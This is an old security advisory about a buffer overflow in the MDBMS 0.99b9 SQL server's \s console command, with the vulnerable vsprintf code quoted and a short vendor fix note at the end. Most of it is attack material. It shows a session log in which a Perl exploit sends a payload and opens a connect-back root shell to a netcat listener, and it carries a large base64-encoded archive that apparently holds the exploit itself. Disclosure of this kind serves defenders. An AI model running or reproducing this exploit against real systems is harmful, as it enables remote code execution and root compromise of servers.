COMMAND
MDBMS
SYSTEMS AFFECTED
MDBMS 0.99b9 and below
PROBLEM
teleh0r found following. MDBMS is a SQL database server
(currently) for UNIX systems. Version 0.99b9 and below versions
contain an exploitable buffer overflow in the handling of the \s
console command.
When a user passes large buffers to the server in the form of
multiple lines, these are appended to the end of each other. A
subsequent call to the \s command causes the overflow.
Below is faulty code (from interface.cc):
void user::uprintf(char *s, ...)
{
char b[10000];
int len=strlen(outbuf), newlen;
va_list ap;
va_start(ap,s);
vsprintf(b,s,ap); <----
va_end(ap);
newlen=strlen(b);
while (newlen+len+10>=outsize) outbuf=(char*)realloc(outbuf,outsize+=1000);
strcat(outbuf,b);
FD_SET(fd,&parent->wmask);
}
Exploit example:
[teleh0r@localhost mdbms]$ ./mdbms-pms.pl
-- Remote code execution exploit - MDBMS <= 0.99b
-- <teleh0r@digit-labs.org> - Copyright (c) 2001
Usage: ./mdbms-pms.pl -t <hostname> -b <back>
-t <hostname> : hostname to test
-b <back> : connect back to ip
-p <port> : port (default: 2223)
-d <delay> : delay before timeout
-o <offset> : offset
-h : return to heap
[teleh0r@localhost mdbms]$ nc -l -v -p 1337 &
[1] 2070
listening on [any] 1337 ...
[teleh0r@localhost mdbms]$ ./mdbms-pms.pl -t 127.1 -b localhost -h
-- Remote code execution exploit - MDBMS <= 0.99b
-- <teleh0r@digit-labs.org> - Copyright (c) 2001
-> Connected to: 127.1 / MDBMS V0.99b9 ready.
-> Address : 0x302027d / xor-mask: 0x2020202
-> Return : 0x80cfe76 / using the heap ...
-> Sending payload: ...
-> * Successfully sent payload - good luck!
connect to [127.0.0.1] from localhost.localdomain [127.0.0.1] 1189
[teleh0r@localhost mdbms]$ %
nc -l -v -p 1337
whoami; uname -mnrsp
root
Linux localhost.localdomain 2.4.2-2 i686 unknown
...
Exploit code attached (MIMED):
---
Content-Type: application/octet-stream; name="mdbms.tar.gz"
Content-Transfer-Encoding: base64
Content-Disposition: inline; filename="mdbms.tar.gz"
Content-MD5: x0xnO/SGP+RgmnELFfaHzw==
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
-----
SOLUTION
mu-b also found a buffer overflow in the "create database" system.
This was actually caused by a sprintf that generated the name of
the management variable. This has been fixed - now table and
database names can no longer be larger than 128 bytes.
Information about the overflows was sent to marty@hinttech.com.
He has now fixed the problems, and new versions of MDBMS can
be found at:
http://www.hinttech.com/mdbms/